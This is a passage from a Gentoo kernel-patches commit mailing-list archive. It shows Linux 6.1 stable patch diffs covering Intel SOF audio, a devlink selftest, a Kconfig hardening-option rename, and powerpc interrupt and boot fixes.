+ 	.ops = &sof_cnl_ops,
+ 	.ops_init = sof_cnl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-mtl.c b/sound/soc/sof/intel/pci-mtl.c
+index 9f39da984e9fa..4dae256536bf4 100644
+--- a/sound/soc/sof/intel/pci-mtl.c
++++ b/sound/soc/sof/intel/pci-mtl.c
+@@ -43,6 +43,7 @@ static const struct sof_dev_desc mtl_desc = {
+ 	.nocodec_tplg_filename = "sof-mtl-nocodec.tplg",
+ 	.ops = &sof_mtl_ops,
+ 	.ops_init = sof_mtl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-skl.c b/sound/soc/sof/intel/pci-skl.c
+index 3a99dc444f92e..5b4bccf819658 100644
+--- a/sound/soc/sof/intel/pci-skl.c
++++ b/sound/soc/sof/intel/pci-skl.c
+@@ -38,6 +38,7 @@ static struct sof_dev_desc skl_desc = {
+ 	.nocodec_tplg_filename = "sof-skl-nocodec.tplg",
+ 	.ops = &sof_skl_ops,
+ 	.ops_init = sof_skl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static struct sof_dev_desc kbl_desc = {
+@@ -61,6 +62,7 @@ static struct sof_dev_desc kbl_desc = {
+ 	.nocodec_tplg_filename = "sof-kbl-nocodec.tplg",
+ 	.ops = &sof_skl_ops,
+ 	.ops_init = sof_skl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-tgl.c b/sound/soc/sof/intel/pci-tgl.c
+index 4cfe4f242fc5e..ccaf0ff9eb1c3 100644
+--- a/sound/soc/sof/intel/pci-tgl.c
++++ b/sound/soc/sof/intel/pci-tgl.c
+@@ -45,6 +45,7 @@ static const struct sof_dev_desc tgl_desc = {
+ 	.nocodec_tplg_filename = "sof-tgl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc tglh_desc = {
+@@ -101,6 +102,7 @@ static const struct sof_dev_desc ehl_desc = {
+ 	.nocodec_tplg_filename = "sof-ehl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc adls_desc = {
+@@ -129,6 +131,7 @@ static const struct sof_dev_desc adls_desc = {
+ 	.nocodec_tplg_filename = "sof-adl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc adl_desc = {
+@@ -157,6 +160,7 @@ static const struct sof_dev_desc adl_desc = {
+ 	.nocodec_tplg_filename = "sof-adl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc adl_n_desc = {
+@@ -185,6 +189,7 @@ static const struct sof_dev_desc adl_n_desc = {
+ 	.nocodec_tplg_filename = "sof-adl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc rpls_desc = {
+@@ -213,6 +218,7 @@ static const struct sof_dev_desc rpls_desc = {
+ 	.nocodec_tplg_filename = "sof-rpl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc rpl_desc = {
+@@ -241,6 +247,7 @@ static const struct sof_dev_desc rpl_desc = {
+ 	.nocodec_tplg_filename = "sof-rpl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/ipc4-topology.h b/sound/soc/sof/ipc4-topology.h
+index 0aa87a8add5d3..2363a7cc0b57d 100644
+--- a/sound/soc/sof/ipc4-topology.h
++++ b/sound/soc/sof/ipc4-topology.h
+@@ -46,7 +46,7 @@
+ #define SOF_IPC4_NODE_INDEX_INTEL_SSP(x) (((x) & 0xf) << 4)
+ 
+ /* Node ID for DMIC type DAI copiers */
+-#define SOF_IPC4_NODE_INDEX_INTEL_DMIC(x) (((x) & 0x7) << 5)
++#define SOF_IPC4_NODE_INDEX_INTEL_DMIC(x) ((x) & 0x7)
+ 
+ #define SOF_IPC4_GAIN_ALL_CHANNELS_MASK 0xffffffff
+ #define SOF_IPC4_VOL_ZERO_DB	0x7fffffff
+diff --git a/tools/testing/selftests/lib.mk b/tools/testing/selftests/lib.mk
+index f7900e75d2306..05400462c7799 100644
+--- a/tools/testing/selftests/lib.mk
++++ b/tools/testing/selftests/lib.mk
+@@ -10,12 +10,14 @@ endif
+ CLANG_TARGET_FLAGS_arm          := arm-linux-gnueabi
+ CLANG_TARGET_FLAGS_arm64        := aarch64-linux-gnu
+ CLANG_TARGET_FLAGS_hexagon      := hexagon-linux-musl
++CLANG_TARGET_FLAGS_i386         := i386-linux-gnu
+ CLANG_TARGET_FLAGS_m68k         := m68k-linux-gnu
+ CLANG_TARGET_FLAGS_mips         := mipsel-linux-gnu
+ CLANG_TARGET_FLAGS_powerpc      := powerpc64le-linux-gnu
+ CLANG_TARGET_FLAGS_riscv        := riscv64-linux-gnu
+ CLANG_TARGET_FLAGS_s390         := s390x-linux-gnu
+ CLANG_TARGET_FLAGS_x86          := x86_64-linux-gnu
++CLANG_TARGET_FLAGS_x86_64       := x86_64-linux-gnu
+ CLANG_TARGET_FLAGS              := $(CLANG_TARGET_FLAGS_$(ARCH))
+ 
+ ifeq ($(CROSS_COMPILE),)
+diff --git a/tools/testing/selftests/net/devlink_port_split.py b/tools/testing/selftests/net/devlink_port_split.py
+index 2b5d6ff873738..2d84c7a0be6b2 100755
+--- a/tools/testing/selftests/net/devlink_port_split.py
++++ b/tools/testing/selftests/net/devlink_port_split.py
+@@ -59,6 +59,8 @@ class devlink_ports(object):
+         assert stderr == ""
+         ports = json.loads(stdout)['port']
+ 
++        validate_devlink_output(ports, 'flavour')
++
+         for port in ports:
+             if dev in port:
+                 if ports[port]['flavour'] == 'physical':
+@@ -220,6 +222,27 @@ def split_splittable_port(port, k, lanes, dev):
+     unsplit(port.bus_info)
+ 
+ 
++def validate_devlink_output(devlink_data, target_property=None):
++    """
++    Determine if test should be skipped by checking:
++      1. devlink_data contains values
++      2. The target_property exist in devlink_data
++    """
++    skip_reason = None
++    if any(devlink_data.values()):
++        if target_property:
++            skip_reason = "{} not found in devlink output, test skipped".format(target_property)
++            for key in devlink_data:
++                if target_property in devlink_data[key]:
++                    skip_reason = None
++    else:
++        skip_reason = 'devlink output is empty, test skipped'
++
++    if skip_reason:
++        print(skip_reason)
++        sys.exit(KSFT_SKIP)
++
++
+ def make_parser():
+     parser = argparse.ArgumentParser(description='A test for port splitting.')
+     parser.add_argument('--dev',
+@@ -240,12 +263,9 @@ def main(cmdline=None):
+         stdout, stderr = run_command(cmd)
+         assert stderr == ""
+ 
++        validate_devlink_output(json.loads(stdout))
+         devs = json.loads(stdout)['dev']
+-        if devs:
+-            dev = list(devs.keys())[0]
+-        else:
+-            print("no devlink device was found, test skipped")
+-            sys.exit(KSFT_SKIP)
++        dev = list(devs.keys())[0]
+ 
+     cmd = "devlink dev show %s" % dev
+     stdout, stderr = run_command(cmd)
+@@ -255,6 +275,7 @@ def main(cmdline=None):
+ 
+     ports = devlink_ports(dev)
+ 
++    found_max_lanes = False
+     for port in ports.if_names:
+         max_lanes = get_max_lanes(port.name)
+ 
+@@ -277,6 +298,11 @@ def main(cmdline=None):
+                 split_splittable_port(port, lane, max_lanes, dev)
+ 
+                 lane //= 2
++        found_max_lanes = True
++
++    if not found_max_lanes:
++        print(f"Test not started, no port of device {dev} reports max_lanes")
++        sys.exit(KSFT_SKIP)
+ 
+ 
+ if __name__ == "__main__":


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-21 13:32 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-21 13:32 UTC (permalink / raw
  To: gentoo-commits

commit:     3bfe7b2e69232e514f1e7d6f7ed8302bf4878467
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Mar 21 12:58:39 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Mar 21 13:31:49 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=3bfe7b2e

Fix config change from X86_X32 to X86_X32_ABI

Thanks to Frank Limpert

Bug: https://bugs.gentoo.org/902443

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 4567_distro-Gentoo-Kconfig.patch | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/4567_distro-Gentoo-Kconfig.patch b/4567_distro-Gentoo-Kconfig.patch
index 9e0701dd..9cb1eb0c 100644
--- a/4567_distro-Gentoo-Kconfig.patch
+++ b/4567_distro-Gentoo-Kconfig.patch
@@ -185,7 +185,7 @@
 +config GENTOO_KERNEL_SELF_PROTECTION_COMMON
 +	bool "Enable Kernel Self Protection Project Recommendations"
 +
-+	depends on GENTOO_LINUX && !ACPI_CUSTOM_METHOD && !COMPAT_BRK && !PROC_KCORE && !COMPAT_VDSO && !KEXEC && !HIBERNATION && !LEGACY_PTYS && !X86_X32 && !MODIFY_LDT_SYSCALL && GCC_PLUGINS && !IOMMU_DEFAULT_DMA_LAZY && !IOMMU_DEFAULT_PASSTHROUGH && IOMMU_DEFAULT_DMA_STRICT && SECURITY && !ARCH_EPHEMERAL_INODES  && RANDSTRUCT_PERFORMANCE
++	depends on GENTOO_LINUX && !ACPI_CUSTOM_METHOD && !COMPAT_BRK && !PROC_KCORE && !COMPAT_VDSO && !KEXEC && !HIBERNATION && !LEGACY_PTYS && !X86_X32_ABI && !MODIFY_LDT_SYSCALL && GCC_PLUGINS && !IOMMU_DEFAULT_DMA_LAZY && !IOMMU_DEFAULT_PASSTHROUGH && IOMMU_DEFAULT_DMA_STRICT && SECURITY && !ARCH_EPHEMERAL_INODES  && RANDSTRUCT_PERFORMANCE
 +
 +	select BUG
 +	select STRICT_KERNEL_RWX


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-17 10:43 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-17 10:43 UTC (permalink / raw
  To: gentoo-commits

commit:     37741a37bb8ed70e4d9d33faf73da22b41dbf0d1
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar 17 10:43:15 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar 17 10:43:15 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=37741a37

Linux patch 6.1.20

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1019_linux-6.1.20.patch | 6280 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6284 insertions(+)

diff --git a/0000_README b/0000_README
index 3728b6a9..4b2b0a69 100644
--- a/0000_README
+++ b/0000_README
@@ -119,6 +119,10 @@ Patch:  1018_linux-6.1.19.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.19
 
+Patch:  1019_linux-6.1.20.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.20
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1019_linux-6.1.20.patch b/1019_linux-6.1.20.patch
new file mode 100644
index 00000000..66126f8f
--- /dev/null
+++ b/1019_linux-6.1.20.patch
@@ -0,0 +1,6280 @@
+diff --git a/Makefile b/Makefile
+index ea18c4c20738c..a842ec6d19325 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 19
++SUBLEVEL = 20
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/alpha/kernel/module.c b/arch/alpha/kernel/module.c
+index 5b60c248de9ea..cbefa5a773846 100644
+--- a/arch/alpha/kernel/module.c
++++ b/arch/alpha/kernel/module.c
+@@ -146,10 +146,8 @@ apply_relocate_add(Elf64_Shdr *sechdrs, const char *strtab,
+ 	base = (void *)sechdrs[sechdrs[relsec].sh_info].sh_addr;
+ 	symtab = (Elf64_Sym *)sechdrs[symindex].sh_addr;
+ 
+-	/* The small sections were sorted to the end of the segment.
+-	   The following should definitely cover them.  */
+-	gp = (u64)me->core_layout.base + me->core_layout.size - 0x8000;
+ 	got = sechdrs[me->arch.gotsecindex].sh_addr;
++	gp = got + 0x8000;
+ 
+ 	for (i = 0; i < n; i++) {
+ 		unsigned long r_sym = ELF64_R_SYM (rela[i].r_info);
+diff --git a/arch/m68k/kernel/setup_mm.c b/arch/m68k/kernel/setup_mm.c
+index 3a2bb2e8fdad4..fbff1cea62caa 100644
+--- a/arch/m68k/kernel/setup_mm.c
++++ b/arch/m68k/kernel/setup_mm.c
+@@ -326,16 +326,16 @@ void __init setup_arch(char **cmdline_p)
+ 		panic("No configuration setup");
+ 	}
+ 
+-#ifdef CONFIG_BLK_DEV_INITRD
+-	if (m68k_ramdisk.size) {
++	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && m68k_ramdisk.size)
+ 		memblock_reserve(m68k_ramdisk.addr, m68k_ramdisk.size);
++
++	paging_init();
++
++	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && m68k_ramdisk.size) {
+ 		initrd_start = (unsigned long)phys_to_virt(m68k_ramdisk.addr);
+ 		initrd_end = initrd_start + m68k_ramdisk.size;
+ 		pr_info("initrd: %08lx - %08lx\n", initrd_start, initrd_end);
+ 	}
+-#endif
+-
+-	paging_init();
+ 
+ #ifdef CONFIG_NATFEAT
+ 	nf_init();
+diff --git a/arch/mips/include/asm/mach-rc32434/pci.h b/arch/mips/include/asm/mach-rc32434/pci.h
+index 9a6eefd127571..3eb767c8a4eec 100644
+--- a/arch/mips/include/asm/mach-rc32434/pci.h
++++ b/arch/mips/include/asm/mach-rc32434/pci.h
+@@ -374,7 +374,7 @@ struct pci_msu {
+ 				 PCI_CFG04_STAT_SSE | \
+ 				 PCI_CFG04_STAT_PE)
+ 
+-#define KORINA_CNFG1		((KORINA_STAT<<16)|KORINA_CMD)
++#define KORINA_CNFG1		(KORINA_STAT | KORINA_CMD)
+ 
+ #define KORINA_REVID		0
+ #define KORINA_CLASS_CODE	0
+diff --git a/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts b/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts
+index 73f8c998c64df..d4f5f159d6f23 100644
+--- a/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts
++++ b/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts
+@@ -10,7 +10,6 @@
+ 
+ / {
+ 	model = "fsl,T1040RDB-REV-A";
+-	compatible = "fsl,T1040RDB-REV-A";
+ };
+ 
+ &seville_port0 {
+diff --git a/arch/powerpc/include/asm/hw_irq.h b/arch/powerpc/include/asm/hw_irq.h
+index eb6d094083fd6..317659fdeacf2 100644
+--- a/arch/powerpc/include/asm/hw_irq.h
++++ b/arch/powerpc/include/asm/hw_irq.h
+@@ -36,15 +36,17 @@
+ #define PACA_IRQ_DEC		0x08 /* Or FIT */
+ #define PACA_IRQ_HMI		0x10
+ #define PACA_IRQ_PMI		0x20
++#define PACA_IRQ_REPLAYING	0x40
+ 
+ /*
+  * Some soft-masked interrupts must be hard masked until they are replayed
+  * (e.g., because the soft-masked handler does not clear the exception).
++ * Interrupt replay itself must remain hard masked too.
+  */
+ #ifdef CONFIG_PPC_BOOK3S
+-#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE|PACA_IRQ_PMI)
++#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE|PACA_IRQ_PMI|PACA_IRQ_REPLAYING)
+ #else
+-#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE)
++#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE|PACA_IRQ_REPLAYING)
+ #endif
+ 
+ #endif /* CONFIG_PPC64 */
+diff --git a/arch/powerpc/include/asm/paca.h b/arch/powerpc/include/asm/paca.h
+index 09f1790d0ae16..0ab3511a47d77 100644
+--- a/arch/powerpc/include/asm/paca.h
++++ b/arch/powerpc/include/asm/paca.h
+@@ -295,7 +295,6 @@ extern void free_unused_pacas(void);
+ 
+ #else /* CONFIG_PPC64 */
+ 
+-static inline void allocate_paca_ptrs(void) { }
+ static inline void allocate_paca(int cpu) { }
+ static inline void free_unused_pacas(void) { }
+ 
+diff --git a/arch/powerpc/include/asm/smp.h b/arch/powerpc/include/asm/smp.h
+index f63505d74932b..6c6cb53d70458 100644
+--- a/arch/powerpc/include/asm/smp.h
++++ b/arch/powerpc/include/asm/smp.h
+@@ -26,6 +26,7 @@
+ #include <asm/percpu.h>
+ 
+ extern int boot_cpuid;
++extern int boot_cpu_hwid; /* PPC64 only */
+ extern int spinning_secondaries;
+ extern u32 *cpu_to_phys_id;
+ extern bool coregroup_enabled;
+diff --git a/arch/powerpc/kernel/iommu.c b/arch/powerpc/kernel/iommu.c
+index caebe1431596e..ee95937bdaf14 100644
+--- a/arch/powerpc/kernel/iommu.c
++++ b/arch/powerpc/kernel/iommu.c
+@@ -67,11 +67,9 @@ static void iommu_debugfs_add(struct iommu_table *tbl)
+ static void iommu_debugfs_del(struct iommu_table *tbl)
+ {
+ 	char name[10];
+-	struct dentry *liobn_entry;
+ 
+ 	sprintf(name, "%08lx", tbl->it_index);
+-	liobn_entry = debugfs_lookup(name, iommu_debugfs_dir);
+-	debugfs_remove(liobn_entry);
++	debugfs_lookup_and_remove(name, iommu_debugfs_dir);
+ }
+ #else
+ static void iommu_debugfs_add(struct iommu_table *tbl){}
+diff --git a/arch/powerpc/kernel/irq_64.c b/arch/powerpc/kernel/irq_64.c
+index eb2b380e52a0d..9dc0ad3c533a8 100644
+--- a/arch/powerpc/kernel/irq_64.c
++++ b/arch/powerpc/kernel/irq_64.c
+@@ -70,22 +70,19 @@ int distribute_irqs = 1;
+ 
+ static inline void next_interrupt(struct pt_regs *regs)
+ {
+-	/*
+-	 * Softirq processing can enable/disable irqs, which will leave
+-	 * MSR[EE] enabled and the soft mask set to IRQS_DISABLED. Fix
+-	 * this up.
+-	 */
+-	if (!(local_paca->irq_happened & PACA_IRQ_HARD_DIS))
+-		hard_irq_disable();
+-	else
+-		irq_soft_mask_set(IRQS_ALL_DISABLED);
++	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
++		WARN_ON(!(local_paca->irq_happened & PACA_IRQ_HARD_DIS));
++		WARN_ON(irq_soft_mask_return() != IRQS_ALL_DISABLED);
++	}
+ 
+ 	/*
+ 	 * We are responding to the next interrupt, so interrupt-off
+ 	 * latencies should be reset here.
+ 	 */
++	lockdep_hardirq_exit();
+ 	trace_hardirqs_on();
+ 	trace_hardirqs_off();
++	lockdep_hardirq_enter();
+ }
+ 
+ static inline bool irq_happened_test_and_clear(u8 irq)
+@@ -97,22 +94,11 @@ static inline bool irq_happened_test_and_clear(u8 irq)
+ 	return false;
+ }
+ 
+-void replay_soft_interrupts(void)
++static void __replay_soft_interrupts(void)
+ {
+ 	struct pt_regs regs;
+ 
+ 	/*
+-	 * Be careful here, calling these interrupt handlers can cause
+-	 * softirqs to be raised, which they may run when calling irq_exit,
+-	 * which will cause local_irq_enable() to be run, which can then
+-	 * recurse into this function. Don't keep any state across
+-	 * interrupt handler calls which may change underneath us.
+-	 *
+-	 * Softirqs can not be disabled over replay to stop this recursion
+-	 * because interrupts taken in idle code may require RCU softirq
+-	 * to run in the irq RCU tracking context. This is a hard problem
+-	 * to fix without changes to the softirq or idle layer.
+-	 *
+ 	 * We use local_paca rather than get_paca() to avoid all the
+ 	 * debug_smp_processor_id() business in this low level function.
+ 	 */
+@@ -120,13 +106,20 @@ void replay_soft_interrupts(void)
+ 	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
+ 		WARN_ON_ONCE(mfmsr() & MSR_EE);
+ 		WARN_ON(!(local_paca->irq_happened & PACA_IRQ_HARD_DIS));
++		WARN_ON(local_paca->irq_happened & PACA_IRQ_REPLAYING);
+ 	}
+ 
++	/*
++	 * PACA_IRQ_REPLAYING prevents interrupt handlers from enabling
++	 * MSR[EE] to get PMIs, which can result in more IRQs becoming
++	 * pending.
++	 */
++	local_paca->irq_happened |= PACA_IRQ_REPLAYING;
++
+ 	ppc_save_regs(&regs);
+ 	regs.softe = IRQS_ENABLED;
+ 	regs.msr |= MSR_EE;
+ 
+-again:
+ 	/*
+ 	 * Force the delivery of pending soft-disabled interrupts on PS3.
+ 	 * Any HV call will have this side effect.
+@@ -175,13 +168,14 @@ again:
+ 		next_interrupt(&regs);
+ 	}
+ 
+-	/*
+-	 * Softirq processing can enable and disable interrupts, which can
+-	 * result in new irqs becoming pending. Must keep looping until we
+-	 * have cleared out all pending interrupts.
+-	 */
+-	if (local_paca->irq_happened & ~PACA_IRQ_HARD_DIS)
+-		goto again;
++	local_paca->irq_happened &= ~PACA_IRQ_REPLAYING;
++}
++
++void replay_soft_interrupts(void)
++{
++	irq_enter(); /* See comment in arch_local_irq_restore */
++	__replay_soft_interrupts();
++	irq_exit();
+ }
+ 
+ #if defined(CONFIG_PPC_BOOK3S_64) && defined(CONFIG_PPC_KUAP)
+@@ -200,13 +194,13 @@ static inline void replay_soft_interrupts_irqrestore(void)
+ 	if (kuap_state != AMR_KUAP_BLOCKED)
+ 		set_kuap(AMR_KUAP_BLOCKED);
+ 
+-	replay_soft_interrupts();
++	__replay_soft_interrupts();
+ 
+ 	if (kuap_state != AMR_KUAP_BLOCKED)
+ 		set_kuap(kuap_state);
+ }
+ #else
+-#define replay_soft_interrupts_irqrestore() replay_soft_interrupts()
++#define replay_soft_interrupts_irqrestore() __replay_soft_interrupts()
+ #endif
+ 
+ notrace void arch_local_irq_restore(unsigned long mask)
+@@ -219,9 +213,13 @@ notrace void arch_local_irq_restore(unsigned long mask)
+ 		return;
+ 	}
+ 
+-	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG))
+-		WARN_ON_ONCE(in_nmi() || in_hardirq());
++	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
++		WARN_ON_ONCE(in_nmi());
++		WARN_ON_ONCE(in_hardirq());
++		WARN_ON_ONCE(local_paca->irq_happened & PACA_IRQ_REPLAYING);
++	}
+ 
++again:
+ 	/*
+ 	 * After the stb, interrupts are unmasked and there are no interrupts
+ 	 * pending replay. The restart sequence makes this atomic with
+@@ -248,6 +246,12 @@ notrace void arch_local_irq_restore(unsigned long mask)
+ 	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG))
+ 		WARN_ON_ONCE(!(mfmsr() & MSR_EE));
+ 
++	/*
++	 * If we came here from the replay below, we might have a preempt
++	 * pending (due to preempt_enable_no_resched()). Have to check now.
++	 */
++	preempt_check_resched();
++
+ 	return;
+ 
+ happened:
+@@ -261,6 +265,7 @@ happened:
+ 		irq_soft_mask_set(IRQS_ENABLED);
+ 		local_paca->irq_happened = 0;
+ 		__hard_irq_enable();
++		preempt_check_resched();
+ 		return;
+ 	}
+ 
+@@ -296,12 +301,38 @@ happened:
+ 	irq_soft_mask_set(IRQS_ALL_DISABLED);
+ 	trace_hardirqs_off();
+ 
++	/*
++	 * Now enter interrupt context. The interrupt handlers themselves
++	 * also call irq_enter/exit (which is okay, they can nest). But call
++	 * it here now to hold off softirqs until the below irq_exit(). If
++	 * we allowed replayed handlers to run softirqs, that enables irqs,
++	 * which must replay interrupts, which recurses in here and makes
++	 * things more complicated. The recursion is limited to 2, and it can
++	 * be made to work, but it's complicated.
++	 *
++	 * local_bh_disable can not be used here because interrupts taken in
++	 * idle are not in the right context (RCU, tick, etc) to run softirqs
++	 * so irq_enter must be called.
++	 */
++	irq_enter();
++
+ 	replay_soft_interrupts_irqrestore();
+ 
++	irq_exit();
++
++	if (unlikely(local_paca->irq_happened != PACA_IRQ_HARD_DIS)) {
++		/*
++		 * The softirq processing in irq_exit() may enable interrupts
++		 * temporarily, which can result in MSR[EE] being enabled and
++		 * more irqs becoming pending. Go around again if that happens.
++		 */
++		trace_hardirqs_on();
++		preempt_enable_no_resched();
++		goto again;
++	}
++
+ 	trace_hardirqs_on();
+ 	irq_soft_mask_set(IRQS_ENABLED);
+-	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG))
+-		WARN_ON(local_paca->irq_happened != PACA_IRQ_HARD_DIS);
+ 	local_paca->irq_happened = 0;
+ 	__hard_irq_enable();
+ 	preempt_enable();
+diff --git a/arch/powerpc/kernel/prom.c b/arch/powerpc/kernel/prom.c
+index 1eed87d954ba8..8537c354c560b 100644
+--- a/arch/powerpc/kernel/prom.c
++++ b/arch/powerpc/kernel/prom.c
+@@ -366,8 +366,8 @@ static int __init early_init_dt_scan_cpus(unsigned long node,
+ 	    be32_to_cpu(intserv[found_thread]));
+ 	boot_cpuid = found;
+ 
+-	// Pass the boot CPU's hard CPU id back to our caller
+-	*((u32 *)data) = be32_to_cpu(intserv[found_thread]);
++	if (IS_ENABLED(CONFIG_PPC64))
++		boot_cpu_hwid = be32_to_cpu(intserv[found_thread]);
+ 
+ 	/*
+ 	 * PAPR defines "logical" PVR values for cpus that
+@@ -751,7 +751,6 @@ static inline void save_fscr_to_task(void) {}
+ 
+ void __init early_init_devtree(void *params)
+ {
+-	u32 boot_cpu_hwid;
+ 	phys_addr_t limit;
+ 
+ 	DBG(" -> early_init_devtree(%px)\n", params);
+@@ -847,7 +846,7 @@ void __init early_init_devtree(void *params)
+ 	/* Retrieve CPU related informations from the flat tree
+ 	 * (altivec support, boot CPU ID, ...)
+ 	 */
+-	of_scan_flat_dt(early_init_dt_scan_cpus, &boot_cpu_hwid);
++	of_scan_flat_dt(early_init_dt_scan_cpus, NULL);
+ 	if (boot_cpuid < 0) {
+ 		printk("Failed to identify boot CPU !\n");
+ 		BUG();
+@@ -864,11 +863,6 @@ void __init early_init_devtree(void *params)
+ 
+ 	mmu_early_init_devtree();
+ 
+-	// NB. paca is not installed until later in early_setup()
+-	allocate_paca_ptrs();
+-	allocate_paca(boot_cpuid);
+-	set_hard_smp_processor_id(boot_cpuid, boot_cpu_hwid);
+-
+ #ifdef CONFIG_PPC_POWERNV
+ 	/* Scan and build the list of machine check recoverable ranges */
+ 	of_scan_flat_dt(early_init_dt_scan_recoverable_ranges, NULL);
+diff --git a/arch/powerpc/kernel/setup-common.c b/arch/powerpc/kernel/setup-common.c
+index 6d041993a45dc..efb301a4987ca 100644
+--- a/arch/powerpc/kernel/setup-common.c
++++ b/arch/powerpc/kernel/setup-common.c
+@@ -86,6 +86,10 @@ EXPORT_SYMBOL(machine_id);
+ int boot_cpuid = -1;
+ EXPORT_SYMBOL_GPL(boot_cpuid);
+ 
++#ifdef CONFIG_PPC64
++int boot_cpu_hwid = -1;
++#endif
++
+ /*
+  * These are used in binfmt_elf.c to put aux entries on the stack
+  * for each elf executable being started.
+diff --git a/arch/powerpc/kernel/setup_64.c b/arch/powerpc/kernel/setup_64.c
+index a0dee7354fe6b..b2e0d3ce4261c 100644
+--- a/arch/powerpc/kernel/setup_64.c
++++ b/arch/powerpc/kernel/setup_64.c
+@@ -385,17 +385,21 @@ void __init early_setup(unsigned long dt_ptr)
+ 	/*
+ 	 * Do early initialization using the flattened device
+ 	 * tree, such as retrieving the physical memory map or
+-	 * calculating/retrieving the hash table size.
++	 * calculating/retrieving the hash table size, discover
++	 * boot_cpuid and boot_cpu_hwid.
+ 	 */
+ 	early_init_devtree(__va(dt_ptr));
+ 
+-	/* Now we know the logical id of our boot cpu, setup the paca. */
+-	if (boot_cpuid != 0) {
+-		/* Poison paca_ptrs[0] again if it's not the boot cpu */
+-		memset(&paca_ptrs[0], 0x88, sizeof(paca_ptrs[0]));
+-	}
++	allocate_paca_ptrs();
++	allocate_paca(boot_cpuid);
++	set_hard_smp_processor_id(boot_cpuid, boot_cpu_hwid);
+ 	fixup_boot_paca(paca_ptrs[boot_cpuid]);
+ 	setup_paca(paca_ptrs[boot_cpuid]); /* install the paca into registers */
++	// smp_processor_id() now reports boot_cpuid
++
++#ifdef CONFIG_SMP
++	task_thread_info(current)->cpu = boot_cpuid; // fix task_cpu(current)
++#endif
+ 
+ 	/*
+ 	 * Configure exception handlers. This include setting up trampolines
+diff --git a/arch/powerpc/kernel/time.c b/arch/powerpc/kernel/time.c
+index f157552d79b38..285159e65a3ba 100644
+--- a/arch/powerpc/kernel/time.c
++++ b/arch/powerpc/kernel/time.c
+@@ -374,7 +374,7 @@ void vtime_flush(struct task_struct *tsk)
+ #define calc_cputime_factors()
+ #endif
+ 
+-void __delay(unsigned long loops)
++void __no_kcsan __delay(unsigned long loops)
+ {
+ 	unsigned long start;
+ 
